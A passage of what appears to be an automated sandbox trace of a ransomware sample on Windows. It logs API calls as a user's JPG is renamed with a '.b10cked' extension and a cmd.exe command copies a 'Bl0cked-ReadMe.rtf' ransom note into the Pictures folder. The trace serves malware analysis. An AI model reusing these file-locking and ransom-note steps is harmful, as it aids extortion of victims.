_MaxCount=0x7) returned -16 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0145.046] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0145.046] _wcsicmp (_String1="U8SH0R~1.JPG", 
_String2=".") returned 71 [0145.046] _wcsicmp (_String1="U8SH0R~1.JPG", _String2="..") returned 71 [0145.046] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0r~1.jpg")) returned 0x20 [0145.046] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x441ec8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.046] SetErrorMode (uMode=0x0) returned 0x0 [0145.046] SetErrorMode (uMode=0x1) returned 0x0 [0145.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", nBufferLength=0x104, lpBuffer=0x2ceb1c, lpFilePart=0x2ceb04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", lpFilePart=0x2ceb04*="U8SH0R~1.JPG") returned 0x38 [0145.046] SetErrorMode (uMode=0x0) returned 0x1 [0145.046] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x12 [0145.047] _wcsicmp (_String1="U8SH0R~1.JPG", _String2=".") returned 71 [0145.047] _wcsicmp (_String1="U8SH0R~1.JPG", _String2="..") returned 71 [0145.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0r~1.jpg")) returned 0x20 [0145.047] SetErrorMode (uMode=0x0) returned 0x0 [0145.047] SetErrorMode (uMode=0x1) returned 0x0 [0145.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", nBufferLength=0x104, lpBuffer=0x2cef98, lpFilePart=0x2ced30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", lpFilePart=0x2ced30*="U8SH0R~1.JPG") returned 0x38 [0145.047] SetErrorMode (uMode=0x0) returned 0x1 [0145.047] SetErrorMode (uMode=0x0) returned 0x0 [0145.047] SetErrorMode (uMode=0x1) returned 0x0 [0145.047] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2cf1a0, lpFilePart=0x2ced30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", lpFilePart=0x2ced30*="u8sH0rXco9.jpg.b10cked") returned 0x42 [0145.047] SetErrorMode (uMode=0x0) returned 0x1 [0145.047] SetLastError (dwErrCode=0x0) [0145.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg.b10cked")) returned 0xffffffff [0145.047] GetLastError () returned 0x2 [0145.047] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x2ce6ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce6ac) returned 0x430f48 [0145.047] FindNextFileW (in: hFindFile=0x430f48, lpFindFileData=0x2ce6ac | out: lpFindFileData=0x2ce6ac) returned 0 [0145.048] GetLastError () returned 0x12 [0145.048] FindClose (in: hFindFile=0x430f48 | out: hFindFile=0x430f48) returned 1 [0145.049] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x441c68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x441c68) returned 0x430f48 [0145.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2ce944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", lpFilePart=0x0) returned 0x42 [0145.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg", nBufferLength=0x104, lpBuffer=0x2ce944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg", lpFilePart=0x0) returned 0x3a 
[0145.049] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg")) returned 0x20 [0145.049] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg.b10cked"), dwFlags=0x3) returned 1 [0145.050] FindClose (in: hFindFile=0x430f48 | out: hFindFile=0x430f48) returned 1 [0145.050] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ce8f8 | out: _Buffer=" 1") returned 9 [0145.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.050] GetFileType (hFile=0x7) returned 0x2 [0145.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0145.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ce884 | out: lpMode=0x2ce884) returned 1 [0145.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.050] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce8b8 | out: lpConsoleScreenBufferInfo=0x2ce8b8) returned 1 [0145.050] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0145.051] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce8f8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0145.051] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ce8dc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce8dc*=0x1a) returned 1 [0145.051] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.051] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.051] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.051] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.051] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.051] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.051] SetConsoleInputExeNameW () returned 0x1 [0145.051] GetConsoleOutputCP () returned 0x1b5 [0145.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.052] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.052] exit (_Code=0) Process: id = "196" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17190 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17191 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17192 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" 
filename = "" Region: id = 17193 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 17194 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17195 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17196 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17197 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17198 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17199 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17244 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17245 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17246 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17247 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 
17248 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 17249 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17250 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17251 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17252 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17253 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17254 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17255 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17256 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17257 start_va = 0x7f6f0000 
end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17258 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 17259 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17260 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17261 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17262 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17263 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17264 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17265 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 17266 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 17267 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 254 os_tid = 0x9dc [0144.858] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f814 | out: lpSystemTimeAsFileTime=0x20f814*(dwLowDateTime=0x90475680, dwHighDateTime=0x1d440a9)) [0144.858] 
GetCurrentProcessId () returned 0x9f4 [0144.858] GetCurrentThreadId () returned 0x9dc [0144.858] GetTickCount () returned 0x2d2c8 [0144.858] QueryPerformanceCounter (in: lpPerformanceCount=0x20f80c | out: lpPerformanceCount=0x20f80c*=20164720279) returned 1 [0144.859] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.859] __set_app_type (_Type=0x1) [0144.859] __p__fmode () returned 0x76b331f4 [0144.859] __p__commode () returned 0x76b331fc [0144.859] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.859] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.859] GetCurrentThreadId () returned 0x9dc [0144.859] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9dc) returned 0x38 [0144.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.860] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.860] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.860] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.860] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7a4 | out: phkResult=0x20f7a4*=0x0) returned 0x2 [0144.860] VirtualQuery (in: lpAddress=0x20f7db, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: 
lpAddress=0x111000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.860] GetConsoleOutputCP () returned 0x1b5 [0144.860] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.860] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.860] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.861] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.861] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.861] GetEnvironmentStringsW () returned 0x3f0188* [0144.862] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0144.862] GetEnvironmentStringsW () returned 0x3f0188* [0144.862] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0144.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 
ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e714 | out: phkResult=0x20e714*=0x40) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0xb0, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x0, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegCloseKey (hKey=0x40) returned 0x0 [0144.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e714 | out: 
phkResult=0x20e714*=0x40) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x0, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x9, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x9, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x9, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.863] RegCloseKey (hKey=0x40) returned 0x0 [0144.863] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.863] srand (_Seed=0x5b886373) [0144.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"" [0144.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"" [0144.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.863] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.864] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.864] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.864] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.864] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.864] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.864] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.864] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.864] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.864] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.864] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.864] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.864] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.864] GetEnvironmentStringsW () returned 0x3f22d8* [0144.864] FreeEnvironmentStringsW (penv=0x3f22d8) returned 1 [0144.864] 
GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.864] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.864] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.864] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.864] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f4e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.865] GetFullPathNameW 